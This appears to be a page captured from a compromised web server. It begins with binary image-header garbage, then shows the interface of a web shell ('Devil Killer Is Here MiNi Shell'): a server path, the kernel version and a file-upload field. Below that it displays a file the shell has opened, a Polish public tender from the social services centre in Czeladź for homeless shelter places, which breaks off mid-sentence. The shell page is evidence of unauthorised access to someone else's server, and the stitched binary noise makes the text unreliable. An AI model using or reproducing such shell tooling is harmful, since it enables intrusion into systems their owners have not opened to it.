JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20251113/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20251113/0052952201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Udzielenie schronienia osobom bezdomnym z terenu gminy Czeladź w ośrodkach wsparcia – schroniskach dla osób bezdomnych oraz noclegowniach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centrum Usług Społecznych w Czeladzi</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 003450413</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">17 Lipca 27</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Czeladź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-250</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32/265-14-42</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">32/265-68-11</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@cus.czeladz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.cus.czeladz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Udzielenie schronienia osobom bezdomnym z terenu gminy Czeladź w ośrodkach wsparcia – schroniskach dla osób bezdomnych oraz noclegowniach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c0ce0a16-9f6d-4624-9d4b-569c632b0dbe</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00529522</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-11-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00039322/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Udzielenie schronienia osobom bezdomnym</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mops-czeladz.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://mops-czeladz.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://mops-czeladz.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art.13ust.1i2rozporządzenia PEiRady(UE)2016/679z27kwietnia2016w sprawie ochrony os. fizycznych w zwi.z przetwarzaniem danych os.i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy95/46/WE (ogólne rozporządzenie o ochronie danych)(Dz.Urz.UE L119z4.5.2016r.str.1),dalej „RODO”,informuję, że: 1.Administratorem Pani/Pana danych os. jest CUSwCzeladzi z siedzibą przy ul.17Lipca27,41-450Czeladź,mail:cus@cus.czeladz.pl,tel+48322651442.2.W CUSwCz-dzi wyznaczono IODO,z którym może się Pani/Pan skontaktować:drogą elektr. poprzez mail:iod@cus.czeladz.pl,telefonicznie pod nr+48322651442.Z IODOmożna się kontaktować we wszystkich sprawach dot. przetwarzania danych os. oraz korzystania z praw związanych z przetwarzaniem danych.3.Pani/Pana dane os. przetwarzane będą w celu przeprowadzenia postęp. i udzielenia zamówienia, prowadzenia dokumentacji księgowo-podatkowej,archiwizacji danych,dochodzenia roszczeń lub obrony przed roszczeniami.4. Podstawą przetwarzania danych os. jest:ustawa z11.09.2019 r. – PZP;ustawa z27.08.2009o finansach publicznych;ustawa z14.07.1983o narodowym zasobie archiwalnym i archiwach;art.6lit.1 lit.cRODO – przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze.5.Odbiorca lub kategorie odbiorców:Podmioty upoważnione na podst.zawartych umów powierzenia oraz uprawnione na mocy obowiązujących przepisów prawa, w szczególności os.lub podmioty, którym zostanie udostęp.dok.postępowania na podstawie art.18oraz art.74-76PZP.Zasada jawności ma zastosowanie do wszystkich danych osobowych z wyjątkiem danych,o których mowa w art.9ust.1RODO (szczególna kategoria danych).6.Zebrane dane będą przechowywane przez okres nie dłuższy, niż jest to niezbędne do celów,w których dane te są przetwarzane oraz do celów archiwizacyjnych,na podstawie art.22dust.2Ustawy z dnia14lipca1983o narodowym zasobie archiwalnym i archiwach, zgodnie z JRWA,stanowiącym załącznik do Zarządzenia14/2025DyrektoraCUSwCzeladzi z dnia2 stycznia2025-zgodnie z art.78ust.1i4PZPprzez okres4lat od dnia zakończenia postępowania o udzielenie zam,a jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego przekracza 4lata–przez cały okres obowiązywania umowy.7.Posiada Pani/Pan prawo:a)żądania dostępu do danych;w przypadku gdy wykonanie tego obowiązku,wymagałoby niewspółmiernie dużego wysiłku,zam.może zgodnie z art.75PZPżądać od osoby,której dane dotyczą,wskazania dodatkowych informacji mających na celu sprecyzowanie nazwy lub daty zakończonego postęp. udzielenie zam.b)żądania sprostowania lub uzupełnienia danych osobowych;zgodnie z art.76PZPwykonanie tego obowiązku nie może naruszać integralności protokołu postęp.oraz jego załączników;c)usunięcia danych,w przypadku gdy dane osobowe nie są już niezbędne do celów,w których zostały zebrane lub w inny sposób przetwarzane;	d)żądania ograniczenia przetwarzania danych osobowych; zgodnie z art.74ust.3 PZP wykonanie tego obowiązku nie ogranicza przetwarzania danych osobowych do czasu zakończenie postępowania o udzielenie zamówienia.8.Przysługuje Pani/Pan prawo do wniesienia skargi do organu nadzorczego, tj.UODOul.Stawki 2,00-913Warszawa.9.Pani/Pana dane osobowe nie będą poddawane zautomatyzowanemu podejmowaniu decyzji,w tym również profilowaniu.10.Pani/Pana dane osobowe nie będą przekazywane odbiorcom w państwach znajdujących się poza UEiEOGlub do organizacji międzynarodowej.11.Podanie danych osobowych jest wymogiem ustawowym określonym w przepisach PZP,związanych z udziałem w postępowaniu o udzielenie zamówienia.Konsekwencje niepodania określonych danych wynikają z PZP.12.Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art.14RODOwzględem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od Wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art.14ust.5RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.15.U.CUS.25</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 648953,2 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> część I:<br/>Udzielenie schronienia w schronisku dla osób bezdomnych – dla mężczyzn - 12<br/><br/>Usługa polegająca na udzieleniu schronienia osobom bezdomnym z terenu gminy Czeladź w ośrodkach wsparcia – schroniskach dla osób bezdomnych będzie realizowane zgodnie z: ustawą o pomocy społecznej z dnia 12 marca 2004 r. (t.j. Dz. U. z 2025r. poz. 1214 z późn. zm.) oraz Rozporządzeniu Ministra Rodziny, Pracy i Polityki Społecznej w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni z dnia 27 kwietnia 2018 r.<br/>(Dz.U. z 2018 r. poz. 896).<br/>Schronisko powinno gwarantować: <br/>Okres świadczenia usług: Schronisko dla osób bezdomnych świadczy usługi przez cały rok, przez 7 dni<br/>w tygodniu.<br/>Forma świadczonej usługi: Możliwość całodobowego przebywania w schronisku, w tym zapewnienie miejsca do spania w ogrzewanym pomieszczeniu, którego temperatura nie jest niższa niż 20°C.<br/>1) całodobowy dostęp do lokalu, w którym będzie realizowane zadanie,<br/>2) codzienne wyżywienie: 3 posiłki dziennie (śniadanie, obiad, kolacja) w tym 1 gorący posiłek- obiad, przygotowane z zasadami racjonalnego żywienia z pełnowartościowych produktów o wartości kalorycznej jednego posiłku odpowiedniej dla osób dorosłych. Dopuszcza się możliwość przygotowania posiłku<br/>w ramach treningu kulinarnego. Przygotowywanie i wydawanie posiłków musi się odbywać zgodnie<br/>z warunkami przewidzianymi w postanowieniach odpowiednich przepisów sanitarnych, epidemiologicznych<br/>i higienicznych,<br/>3) oddzielne łóżko wraz z pościelą,<br/>4) wydzielone miejsce w szafie, krzesło oraz miejsce przy stole,<br/>5) warunki sanitarne umożliwiające utrzymanie higieny osobistej, w tym zapewnienie podstawowych środków czystości: ciepła woda, mydło, szampon, papier toaletowy, proszek do prania itp.,<br/>6) bielizna osobista oraz odzież i obuwie odpowiednie do pory roku dla osób tego pozbawionych,<br/>7) pomieszczenie świetlicy umożliwiające spędzenie czasu wolnego,<br/>8) warunki lokalowe przystosowane dla osób niepełnosprawnych,<br/>9) miejsce na przechowywanie rzeczy osobistych,<br/>10) miejsce do przygotowywania i spożywania posiłków,<br/>11) gorące napoje w okresie występowania niskich temperatur, <br/>12) możliwość dokonania codziennych zabiegów higienicznych,<br/>13) niezbędne środki czystości,<br/>14) niezbędną odzież na czas konieczny do wyprania i wysuszenia odzieży własnej, <br/>15) możliwość prania, suszenia oraz prasowania swojej odzieży, <br/>16) w przypadkach tego wymagających - udzielanie pomocy w zaspokajaniu codziennych potrzeb życiowych, pomoc przy spożywaniu posiłków, czynnościach higienicznych (mycie, kąpiel, przesłanie łóżka, podawanie zaleconych przez lekarza leków),<br/>17) dostęp do bezpłatnej, ogólnodostępnej 1 (jednej) lodówki,<br/>18) dostęp do bezpłatnego, ogólnodostępnego 1 (jednego) odbiornika telewizyjnego, znajdującego się<br/>w świetlicy Schroniska,<br/>19) niezbędną pomoc w załatwianiu spraw osobistych,<br/>20) w okresie występowania niskich temperatur oraz w przypadkach nagłych, wykonawca nie może odmówić przyjęcia osoby bezdomne z terenu gminy Czeladź do Schroniska. O przyjęciu bezdomnego wykonawca niezwłocznie zawiadomi zamawiającego, nie później niż 1 dzień roboczy po przedmiotowym przyjęciu, celem wydania pisemnej zgody osoby upoważnionej przez zamawiającego na dalsze przebywanie przyjętej osoby w placówce,<br/>21) w okresie występowania niskich temperatur, wykonawca zobowiązany jest do udostępnienia bezdomnym dodatkowych, prowizorycznych miejsc noclegowych w ilości dopuszczonej stosownymi przepisami prawa<br/>(w tym przepisami ppoż i BHP) i możliwościami organizacyjnymi,<br/>22) wykonawca zobowiązany będzie dysponować kadrą niezbędną do realizacji zadania,<br/>23) wykonawca podda się okresowej kontroli i ocenie realizacji zamówienia, w szczególności w celu badania:<br/>a) stanu realizacji umowy, <br/>b) efektywności, rzetelności i jakości realizacji umowy, <br/>c) prawidłowości prowadzonej dokumentacji dotyczącej realizacji zamówienia, a w szczególności list obecności bezdomnych,<br/>24) Osoby przebywające w schronisku pobyt swój potwierdzać będą każdorazowo, w godzinach porannych, na liście obecności, którą wykonawca zobowiązany będzie załączać do wystawianej przez siebie faktury/rachunku.<br/>Dodatkowe wymagania:<br/>- stała współpraca z zamawiającym<br/>- placówka musi spełniać wymogi sanitarne i przeciwpożarowe przewidziane w powszechnie obowiązujących przepisach </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 196735,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311000-2 - Usługi opieki społecznej obejmujące miejsca noclegowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje zastosowanie prawa opcji w ramach części I do 730 osobodni.<br/>Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji (w całości lub w części) w przypadku, gdy w okresie trwania umowy wyczerpaniu ulegnie zakres podstawowy i dodatkowo wykonanie dodatkowej ilości usług będzie leżało w interesie zamawiającego oraz wynikał z jego bieżących potrzeb.<br/>W celu uruchomienia prawa opcji zamawiający złoży wykonawcy pisemne oświadczenie woli w przedmiocie skorzystania z prawa opcji w określonym zakresie. Oświadczenie będzie zawierało potwierdzenie środków finansowych na zrealizowanie zamówienia i będzie stanowiło załącznik do umowy.<br/>Prawo opcji jest jednostronnym uprawnieniem zamawiającego, z którego może, ale nie ma obowiązku skorzystać w ramach realizacji przedmiotu zamówienia. W przypadku nie skorzystania przez zamawiającego z prawa opcji wykonawcy nie przysługują żadne roszczenia z tego tytułu.<br/>Jeżeli zamawiający skorzysta z prawa opcji obowiązkiem umownym wykonawcy jest wykonanie świadczenia w zakresie objętym wykorzystanym prawem opcji na warunkach takich jak zamówienie podstawowe.<br/>Zamawiający ma prawo wielokrotnie korzystać z prawa opcji po zrealizowaniu zakresu podstawowego zamówienia – jednak do wyczerpania maksymalnego zakresu prawa opcji.<br/>Uruchomienie opcji nie będzie wymagało zmiany umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamaw kierował się będzie kryteriami, z uwzględ odpowiednich współczyn wag (znacz wyraż w%) dla tych kryteriów oraz max ilości pkt, jaką może otrzymać oferta za dane kryt: dla wszys 4 części zamów kryt oceny ofert są:1) Cena-max60%(C);2) Odległość od schroniska do siedz CUS w Czeladzi-max 40%(O).Oferty zostaną ocen za pomocą syst punk, zg z kryteri: Kryter I-Cena ofertowa brutto(C) – max60%.a) Zamaw przyzna max liczbę 60 pkt ofercie Wykon z najniższą ceną brutto za wykon przed zamów, zgodnie z formu ofert, stanowią Zał nr1doSWZ.b) Ilość pkt przyzna pozosta ofertom Wykonaw zostanie oblicz zg z wzorem i zaokrągl do 2 miejsc po przecinku.C=najniższa cena występ w ofertach:cena badana x 60. Kryter II–odległość od schron/nocleg do siedziby CUS w Czeladzi–(O).Ocena pkt w tym kryt zostanie dokonana na podst infor zawartej w ofercie wykon o odległości wyraż w pełnych km od wskazanego w Form ofert adresu schroniska/noc do siedziby CUS Czeladź w sposób:„Odległ od schroniska/nocleg do siedziby CUS w Czeladzi“ liczonej w linii prostej w promieniu do 30 km od siedziby CUS (wylicz dokonać używ strony internet: https://www.google.pl/maps).od 0 do15km-40 pkt, pow.15km do30 km-20pkt;pow 30km-0pkt.Zamaw dokona wyboru oferty tego z Wykon, którego oferta uzyska w wyniku oceny najwyż liczbę pkt. Przyznawanie pkt ofertom odbędzie się w oparciu o wzór: L=C+O gdzie: L-liczba pkt uzyskana przez ofertę,C liczba pkt uzyskanych w kryt &#34;Cena&#34;.O–liczba pkt uzyskanych w kryterium &#34;Odległość od schroniska do siedziby CUS w Czeladzi&#34;.W przypad gdy wykona nie wpisze w Form ofert (Załą 1a/b/c/d do SWZ) w punkcie 1.2.tj. w jakiej placówce i pod jakim adresem zrealizuje zamów oraz nie wpisze w jakim promieniu od siedziby CUS w Czeladzi znajduje się dana placówka, Zamaw przyjmuje, że placów znajd się powyż 30km od siedziby CUS i tym samym oferta dostanie 0pkt w kryterII tj.: odległ od schron do siedz CUS w Czeladzi(O).Ocenie będą podlegać wyłącz oferty nie podlegaj odrzuceniu.Za najkorzyst zostanie uznana oferta która otrzyma najwię ilość pkt łącznie ze wszystkich kryt.W syt, gdy Zamaw nie będzie mógł dokonać wyboru najkorzyst oferty ze wzgl na to, że zostały złożone oferty o takiej samej ilości pkt, wezwie on Wykona, którzy złożyli te oferty do złożenia w terminie określ przez Zamaw ofert dodat zawier nową cenę. Wykona składając oferty dodat, nie mogą zaofer cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.W toku badania oferty i oceny ofert Zam może żądać od Wykon wyjaś dot treści złoż przez nich ofert oraz lub innych skład dok lub oświad. Wykon są zobow do przedst wyjaś w terminie wskaz przez Zamaw. Zamaw wybiera najkorzyst ofertę w terminie związania ofertą określonym na Plat zakup z postępow.Jeżeli termin związ ofertą upłynie przed wyborem najkorzyst oferty, Zamaw wezwie Wykon, którego oferta otrzymała najwyższą ocenę do wyrażenia w wyznacz przez Zama w terminie pisemnej zgody na wybór jego oferty. W przyp braku zgody o której mowa w pkt7 oferta podlega odrzuceniu, a Zamaw zwraca się o wyrażenie takiej zgody do kolejnego Wykon, którego oferta została najwyż oceniona, chyba że, zachodzą przesł do unieważ postęp. Zamaw unieważnia postęp o udziel zam, jeżeli:-nie złożono żadnego wniosku o dopuszcz do udziału w postęp albo żadnej oferty; wszystkie złożone wnioski o dopuszcz do udziału w postęp albo oferty podlegały odrzuceniu;-cena lub koszt najkorzj oferty lub oferta z najniższą ceną przewyższa kwotę, którą zama zamierza przeznaczyć na sfinansowanie zamów, chyba że zam może zwiększyć tę kwotę do ceny lub kosztu najkorzyst oferty;-w przyp, o których mowa w art.248ust.3, art.249 i art.250ust.2, zostały złoż oferty dodat o takiej samej cenie lub koszcie;-wystąpiła istotna zmiana okolicz powod, że prowadz postęp lub wyk zamów nie leży w inter publ, czego nie można było wcześniej przewidzieć;-postęp obarczone jest niemoż do usunięcia wadą uniemożliw zawarcie niepodleg unieważ umowy w sprawie zam publ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Odległość od schroniska do siedziby zamawiającego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> część II:<br/>Udzielenie schronienia w schronisku dla osób bezdomnych – dla kobiet - 7<br/><br/>Usługa polegająca na udzieleniu schronienia osobom bezdomnym z terenu gminy Czeladź w ośrodkach wsparcia – schroniskach dla osób bezdomnych będzie realizowane zgodnie z: ustawą o pomocy społecznej z dnia 12 marca 2004 r. (t.j. Dz. U. z 2025r. poz. 1214 z późn. zm.) oraz Rozporządzeniu Ministra Rodziny, Pracy i Polityki Społecznej w sprawie minimalnych standardów noclegowni, schronisk dla osób bezdomnych, schronisk dla osób bezdomnych z usługami opiekuńczymi i ogrzewalni z dnia 27 